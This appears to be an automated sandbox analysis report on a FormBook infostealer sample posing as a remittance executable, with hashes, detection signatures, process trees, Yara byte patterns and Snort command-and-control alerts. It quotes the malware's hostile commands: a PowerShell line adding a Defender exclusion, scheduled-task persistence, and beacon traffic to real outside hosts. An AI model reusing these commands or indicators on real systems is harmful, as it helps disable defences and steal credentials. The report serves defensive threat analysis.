Windows Analysis Report
4TH HIRE SOA REMITTANCE_USD280,000.exe

Overview

General Information

Sample name: 4TH HIRE SOA REMITTANCE_USD280,000.exe
Analysis ID: 1447924
MD5: 7bfc6728400d041f90f6dd5b3f67aa38
SHA1: e3dfa3816a4b4fa3c4e7146953f1cc7debb84be8
SHA256: 92ef596e60597ec73400540ce819005b4d0ca33716ae9f0129547b119415e1d9
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Process Parents
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 4TH HIRE SOA REMITTANCE_USD280,000.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe" MD5: 7BFC6728400D041F90F6DD5B3F67AA38)
    • powershell.exe (PID: 2172 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7348 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4012 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 4TH HIRE SOA REMITTANCE_USD280,000.exe (PID: 7232 cmdline: "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe" MD5: 7BFC6728400D041F90F6DD5B3F67AA38)
      • vFRZZQiLgeOQDzGymvZVa.exe (PID: 6380 cmdline: "C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winver.exe (PID: 7780 cmdline: "C:\Windows\SysWOW64\winver.exe" MD5: B5471B0FB5402FC318C82C994C6BF84D)
          • vFRZZQiLgeOQDzGymvZVa.exe (PID: 6408 cmdline: "C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8052 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • GRogNEHvcL.exe (PID: 7280 cmdline: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe MD5: 7BFC6728400D041F90F6DD5B3F67AA38)
    • schtasks.exe (PID: 7484 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp30FF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • GRogNEHvcL.exe (PID: 7528 cmdline: "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe" MD5: 7BFC6728400D041F90F6DD5B3F67AA38)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ac00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x141af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2dbf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x171a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2dbf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x171a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2cdf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x163a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", ParentImage: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, ParentProcessId: 7112, ParentProcessName: 4TH HIRE SOA REMITTANCE_USD280,000.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", ProcessId: 2172, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe" , CommandLine: "C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe, NewProcessName: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe, OriginalFileName: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe, ParentCommandLine: "C:\Windows\SysWOW64\winver.exe", ParentImage: C:\Windows\SysWOW64\winver.exe, ParentProcessId: 7780, ParentProcessName: winver.exe, ProcessCommandLine: "C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe" , ProcessId: 6408, ProcessName: vFRZZQiLgeOQDzGymvZVa.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp30FF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp30FF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe, ParentImage: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe, ParentProcessId: 7280, ParentProcessName: GRogNEHvcL.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp30FF.tmp", ProcessId: 7484, ProcessName: schtasks.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", ParentImage: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, ParentProcessId: 7112, ParentProcessName: 4TH HIRE SOA REMITTANCE_USD280,000.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp", ProcessId: 4012, ProcessName: schtasks.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", ParentImage: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, ParentProcessId: 7112, ParentProcessName: 4TH HIRE SOA REMITTANCE_USD280,000.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", ProcessId: 2172, ProcessName: powershell.exe

            Persistence and Installation Behavior

            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe", ParentImage: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, ParentProcessId: 7112, ParentProcessName: 4TH HIRE SOA REMITTANCE_USD280,000.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp", ProcessId: 4012, ProcessName: schtasks.exe
            Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
            05/27/24-12:43:42.301762 | 2855465 | 49727 | 80 | TCP | A Network Trojan was detected
            05/27/24-12:44:39.831891 | 2855465 | 49743 | 80 | TCP | A Network Trojan was detected
            05/27/24-12:42:49.943654 | 2855465 | 49714 | 80 | TCP | A Network Trojan was detected
            05/27/24-12:44:53.365787 | 2855465 | 49747 | 80 | TCP | A Network Trojan was detected
            05/27/24-12:44:11.323120 | 2855465 | 49735 | 80 | TCP | A Network Trojan was detected
            05/27/24-12:44:24.871394 | 2855465 | 49739 | 80 | TCP | A Network Trojan was detected
            05/27/24-12:45:49.969014 | 2855465 | 49763 | 80 | TCP | A Network Trojan was detected
            05/27/24-12:43:29.047327 | 2855465 | 49723 | 80 | TCP | A Network Trojan was detected
            05/27/24-12:46:03.256364 | 2855465 | 49767 | 80 | TCP | A Network Trojan was detected
            05/27/24-12:45:07.664711 | 2855465 | 49751 | 80 | TCP | A Network Trojan was detected
            05/27/24-12:43:13.994642 | 2855465 | 49719 | 80 | TCP | A Network Trojan was detected
            05/27/24-12:45:21.505394 | 2855465 | 49755 | 80 | TCP | A Network Trojan was detected
            05/27/24-12:43:57.157571 | 2855465 | 49731 | 80 | TCP | A Network Trojan was detected
            05/27/24-12:45:36.194501 | 2855465 | 49759 | 80 | TCP | A Network Trojan was detected

            AV Detection

            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe, ReversingLabs: Detection: 42%
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, ReversingLabs: Detection: 42%
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, Virustotal: Detection: 54%
            Source: Yara matchFile source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.4497473931.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4495268104.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4493681409.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2334955851.0000000001C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4495209551.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeJoe Sandbox ML: detected
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeJoe Sandbox ML: detected
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: winver.pdb source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2332718421.0000000001307000.00000004.00000020.00020000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000002.4494386152.00000000009F8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000000.2259718718.0000000000F0E000.00000002.00000001.01000000.0000000E.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4493691348.0000000000F0E000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: wntdll.pdbUGP source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2334615268.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495476148.000000000504E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2332306459.0000000004B46000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495476148.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2334615268.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495476148.000000000504E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2332306459.0000000004B46000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495476148.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: winver.pdbGCTL source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2332718421.0000000001307000.00000004.00000020.00020000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000002.4494386152.00000000009F8000.00000004.00000020.00020000.00000000.sdmp

            Networking

            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49714 -> 199.59.243.225:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49719 -> 103.138.88.50:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49723 -> 216.40.34.41:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49727 -> 31.31.196.16:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49731 -> 183.181.79.111:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49735 -> 78.142.211.199:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49739 -> 66.29.149.46:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49743 -> 3.125.172.46:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49747 -> 199.59.243.225:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49751 -> 199.59.243.225:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49755 -> 173.254.28.213:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49759 -> 65.181.132.158:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49763 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49767 -> 51.195.44.77:80
            Source: Joe Sandbox ViewIP Address: 199.59.243.225 199.59.243.225
            Source: Joe Sandbox ViewIP Address: 66.29.149.46 66.29.149.46
            Source: Joe Sandbox ViewASN Name: SAKURA-CSAKURAInternetIncJP SAKURA-CSAKURAInternetIncJP
            Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
            Source: Joe Sandbox ViewASN Name: PAIR-NETWORKSUS PAIR-NETWORKSUS
            Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
            Source: unknown HTTP traffic detected: POST /iqzp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.duhocvietanh.edu.vn Origin: http://www.duhocvietanh.edu.vn Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 207 Referer: http://www.duhocvietanh.edu.vn/iqzp/ User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://duhocvietanh.edu.vn/wp-json/>; rel="https://api.w.org/" content-length: 10950 content-encoding: br vary: Accept-Encoding,User-Agent,Accept-Encoding date: Mon, 27 May 2024 10:43:06 GMT server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://duhocvietanh.edu.vn/wp-json/>; rel="https://api.w.org/" content-length: 10950 content-encoding: br vary: Accept-Encoding,User-Agent,Accept-Encoding date: Mon, 27 May 2024 10:43:08 GMT server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: 7ccaf680-076e-406e-9082-2d4f4500fffa x-runtime: 0.038115 content-length: 18203 connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: 43bd9ea3-1f62-449d-8baa-5a20ee528cd2 x-runtime: 0.024217 content-length: 18223 connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: 891f0020-4b7d-44c7-b130-4fd4745d6a3b x-runtime: 0.023335 content-length: 19239 connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 May 2024 10:43:35 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 May 2024 10:43:37 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 May 2024 10:43:40 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 May 2024 10:43:42 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 27 May 2024 10:43:49 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Mon, 11 Feb 2019 04:23:44 GMT | ETag: W/"afe-58196ac9aed38" | Content-Encoding: br
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 27 May 2024 10:43:52 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Mon, 11 Feb 2019 04:23:44 GMT | ETag: W/"afe-58196ac9aed38" | Content-Encoding: br
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 27 May 2024 10:43:55 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Mon, 11 Feb 2019 04:23:44 GMT | ETag: W/"afe-58196ac9aed38" | Content-Encoding: br
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 27 May 2024 10:43:57 GMT | Content-Type: text/html | Content-Length: 2814 | Connection: close | Vary: Accept-Encoding | Last-Modified: Mon, 11 Feb 2019 04:23:44 GMT | ETag: "afe-58196ac9aed38"
